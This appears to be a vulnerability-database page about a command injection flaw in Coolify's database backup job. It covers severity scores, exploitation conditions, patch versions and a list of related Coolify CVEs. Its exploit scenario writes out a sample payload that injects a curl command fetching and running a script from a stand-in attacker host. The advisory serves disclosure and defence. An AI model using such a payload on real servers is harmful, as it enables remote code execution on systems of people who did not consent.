Severity by source
AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
PR:H for required database management role; S:C with C/I/A:H because arbitrary OS command execution reaches managed servers outside Coolify's own security boundary.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.471, DatabaseBackupJob interpolates user-controlled database credentials and MongoDB collection exclusion names into backup shell commands without adequate escaping, allowing an authenticated user with database management permissions to execute commands on managed servers. This issue is fixed in version 4.0.0-beta.471.
AnalysisAI
Command injection in Coolify's DatabaseBackupJob allows authenticated users holding database management permissions to execute arbitrary OS commands on managed servers by embedding shell metacharacters in database credentials or MongoDB collection exclusion names. All Coolify releases prior to 4.0.0-beta.471 are affected. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated Coolify session with database management permissions - specifically the ability to edit database credentials or configure MongoDB collection exclusion names within the Coolify UI. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The official CVSS 3.3 (Low) score - vector AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N - materially understates real-world risk on two axes. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A developer in a team Coolify deployment - legitimately granted database management permissions but not server shell access - edits the password field of a managed MongoDB instance to append a payload such as ; curl https://attacker.example/implant.sh | bash. When DatabaseBackupJob executes (on its next scheduled run or when triggered manually), Coolify interpolates the malicious credential directly into the backup shell command, causing the injected payload to execute on the managed server with the privileges of the backup process. … |
| Remediation | Upgrade Coolify to version 4.0.0-beta.471 or later, which addresses the injection via commits 952f3247970d261ff93f85c79066192f58f9557e and 99043600ee881fd8581185e7590604d9882382cd as documented at https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.471. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application
Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba
Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,
Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap
Coolify versions prior to v4.0.0-beta.420.7 are vulnerable to a remote code execution vulnerability in the project deplo
Coolify versions prior to v4.0.0-beta.420.6 are vulnerable to a remote code execution vulnerability in the application d
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authentica
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41989